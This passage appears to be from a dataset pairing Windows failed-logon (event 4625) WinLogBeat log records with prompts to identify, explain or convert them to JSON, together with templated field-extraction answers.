Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"organization\":\"wayne\",\"senderHost\":\"10.87.1.30\",\"sensitivity\":\"normal\",\"winlog\":{\"api\":\"wineventlog\",\"channel\":\"Security\",\"computer_name\":\"03SDPBSVR03.SDPB.LOCAL\",\"event_data\":{\"AuthenticationPackageName\":\"NTLM\",\"FailureReason\":\"%%2313\",\"IpAddress\":\"65.144.153.227\",\"IpPort\":\"54979\",\"KeyLength\":\"0\",\"LmPackageName\":\"-\",\"LogonProcessName\":\"NtLmSsp \",\"LogonType\":\"3\",\"ProcessId\":\"0x0\",\"ProcessName\":\"-\",\"Status\":\"0xc000006d\",\"SubStatus\":\"0xc000006a\",\"SubjectDomainName\":\"-\",\"SubjectLogonId\":\"0x0\",\"SubjectUserName\":\"-\",\"SubjectUserSid\":\"S-1-0-0\",\"TargetDomainName\":\"SDPB\",\"TargetUserName\":\"johndoe\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"WorkstationName\":\"IDCSAVIYNT02\"},\"event_id\":\"4625\",\"keywords\":[\"Audit Failure\"],\"opcode\":\"Info\",\"process\":{\"pid\":740,\"thread\":{\"id\":2060}},\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":6122059274,\"task\":\"Logon\"}}", "messagetype": "auth_failure", "productids": [ 6 ], "senderhost": "10.87.1.30", "sensitivity": "normal", "severitylabel": "Info", "sourceinfo": "unknown", "tags": [ "v8", "eventId:4625", "microsoft-windows-security-auditing", "auth_failure" ], "vendorcode": "6122059274", "streamName": "microsoft-windows-security-auditing", "clientIP": "65.144.153.227", "userName": "johndoe" }
Create a JSON artifact from the message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tjohndoe\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t65.144.153.227\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"wayne","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"65.144.153.227","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"johndoe","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}}
Product: Windows Active Directory Vendor: Microsoft
Identify this syslog message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tjohndoe\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t65.144.153.227\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"wayne","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"65.144.153.227","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"johndoe","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}}
This is a syslog message from a product called Windows Active Directory by Microsoft. The following fields were extracted from the message: action: Logon clientport: 54979 messagetype: auth_failure productids: [6] senderhost: 10.87.1.30 sensitivity: normal severitylabel: Info sourceinfo: unknown tags: ['v8', 'eventId:4625', 'microsoft-windows-security-auditing', 'auth_failure'] vendorcode: 6122059274 streamName: microsoft-windows-security-auditing clientIP: 65.144.153.227 userName: johndoe
Explain this syslog message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tbob\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t12.184.62.213\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"umbrella","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"12.184.62.213","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"bob","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}}
{ "action": "Logon", "clientport": 61238, "message": "WitFoo-WinLogBeat ::: {\"@metadata\":{\"beat\":\"winlogbeat\",\"type\":\"_doc\",\"version\":\"8.1.3\"},\"@timestamp\":\"2023-07-17T18:11:48.924Z\",\"agent\":{\"ephemeral_id\":\"4c83ecad-c1b4-4a54-8b3d-8fd365195907\",\"id\":\"8291ec57-310c-4e62-b5bc-e9ba4ac93b35\",\"name\":\"03SDPBSVR03\",\"type\":\"winlogbeat\",\"version\":\"8.1.3\"},\"ecs\":{\"version\":\"8.0.0\"},\"event\":{\"action\":\"Logon\",\"code\":\"4625\",\"created\":\"2023-07-17T18:11:50.394Z\",\"kind\":\"event\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\"},\"host\":{\"name\":\"03SDPBSVR03.SDPB.LOCAL\"},\"log\":{\"level\":\"information\"},\"message\":\"An account failed to log on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nLogon Type:\\t\\t\\t3\\n\\nAccount For Which Logon Failed:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\tbob\\n\\tAccount Domain:\\t\\tSDPB\\n\\nFailure Information:\\n\\tFailure Reason:\\t\\tUnknown user name or bad password.\\n\\tStatus:\\t\\t\\t0xC000006D\\n\\tSub Status:\\t\\t0xC000006A\\n\\nProcess Information:\\n\\tCaller Process ID:\\t0x0\\n\\tCaller Process Name:\\t-\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tIDCSAVIYNT02\\n\\tSource Network Address:\\t12.184.62.213\\n\\tSource Port:\\t\\t61238\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tNtLmSsp \\n\\tAuthentication Package:\\tNTLM\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\n\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\\n\\nThe Process Information fields indicate which account and process on the system requested the logon.\\n\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"organization\":\"umbrella\",\"senderHost\":\"10.87.1.30\",\"sensitivity\":\"normal\",\"winlog\":{\"api\":\"wineventlog\",\"channel\":\"Security\",\"computer_name\":\"03SDPBSVR03.SDPB.LOCAL\",\"event_data\":{\"AuthenticationPackageName\":\"NTLM\",\"FailureReason\":\"%%2313\",\"IpAddress\":\"12.184.62.213\",\"IpPort\":\"61238\",\"KeyLength\":\"0\",\"LmPackageName\":\"-\",\"LogonProcessName\":\"NtLmSsp \",\"LogonType\":\"3\",\"ProcessId\":\"0x0\",\"ProcessName\":\"-\",\"Status\":\"0xc000006d\",\"SubStatus\":\"0xc000006a\",\"SubjectDomainName\":\"-\",\"SubjectLogonId\":\"0x0\",\"SubjectUserName\":\"-\",\"SubjectUserSid\":\"S-1-0-0\",\"TargetDomainName\":\"SDPB\",\"TargetUserName\":\"bob\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"WorkstationName\":\"IDCSAVIYNT02\"},\"event_id\":\"4625\",\"keywords\":[\"Audit Failure\"],\"opcode\":\"Info\",\"process\":{\"pid\":740,\"thread\":{\"id\":13644}},\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":6082954626,\"task\":\"Logon\"}}", "messagetype": "auth_failure", "productids": [ 6 ], "senderhost": "10.87.1.30", "sensitivity": "normal", "severitylabel": "Info", "sourceinfo": "unknown", "tags": [ "v8", "eventId:4625", "microsoft-windows-security-auditing", "auth_failure" ], "vendorcode": "6082954626", "streamName": "microsoft-windows-security-auditing", "clientIP": "12.184.62.213", "userName": "bob" }
Create a JSON artifact from the message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tbob\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t12.184.62.213\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"umbrella","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"12.184.62.213","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"bob","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}}
Product: Windows Active Directory Vendor: Microsoft
Identify this syslog message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tbob\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t12.184.62.213\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"umbrella","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"12.184.62.213","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"bob","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}}
This is a syslog message from a product called Windows Active Directory by Microsoft. The following fields were extracted from the message: action: Logon clientport: 61238 messagetype: auth_failure productids: [6] senderhost: 10.87.1.30 sensitivity: normal severitylabel: Info sourceinfo: unknown tags: ['v8', 'eventId:4625', 'microsoft-windows-security-auditing', 'auth_failure'] vendorcode: 6082954626 streamName: microsoft-windows-security-auditing clientIP: 12.184.62.213 userName: bob
Explain this syslog message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t99.159.217.100\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"stark","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"99.159.217.100","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}}
{ "action": "Logon", "clientport": 61238, "message": "WitFoo-WinLogBeat ::: {\"@metadata\":{\"beat\":\"winlogbeat\",\"type\":\"_doc\",\"version\":\"8.1.3\"},\"@timestamp\":\"2023-07-17T18:11:48.924Z\",\"agent\":{\"ephemeral_id\":\"4c83ecad-c1b4-4a54-8b3d-8fd365195907\",\"id\":\"8291ec57-310c-4e62-b5bc-e9ba4ac93b35\",\"name\":\"03SDPBSVR03\",\"type\":\"winlogbeat\",\"version\":\"8.1.3\"},\"ecs\":{\"version\":\"8.0.0\"},\"event\":{\"action\":\"Logon\",\"code\":\"4625\",\"created\":\"2023-07-17T18:11:50.394Z\",\"kind\":\"event\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\"},\"host\":{\"name\":\"03SDPBSVR03.SDPB.LOCAL\"},\"log\":{\"level\":\"information\"},\"message\":\"An account failed to log on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nLogon Type:\\t\\t\\t3\\n\\nAccount For Which Logon Failed:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\talice\\n\\tAccount Domain:\\t\\tSDPB\\n\\nFailure Information:\\n\\tFailure Reason:\\t\\tUnknown user name or bad password.\\n\\tStatus:\\t\\t\\t0xC000006D\\n\\tSub Status:\\t\\t0xC000006A\\n\\nProcess Information:\\n\\tCaller Process ID:\\t0x0\\n\\tCaller Process Name:\\t-\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tIDCSAVIYNT02\\n\\tSource Network Address:\\t99.159.217.100\\n\\tSource Port:\\t\\t61238\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tNtLmSsp \\n\\tAuthentication Package:\\tNTLM\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\n\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\\n\\nThe Process Information fields indicate which account and process on the system requested the logon.\\n\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"organization\":\"stark\",\"senderHost\":\"10.87.1.30\",\"sensitivity\":\"normal\",\"winlog\":{\"api\":\"wineventlog\",\"channel\":\"Security\",\"computer_name\":\"03SDPBSVR03.SDPB.LOCAL\",\"event_data\":{\"AuthenticationPackageName\":\"NTLM\",\"FailureReason\":\"%%2313\",\"IpAddress\":\"99.159.217.100\",\"IpPort\":\"61238\",\"KeyLength\":\"0\",\"LmPackageName\":\"-\",\"LogonProcessName\":\"NtLmSsp 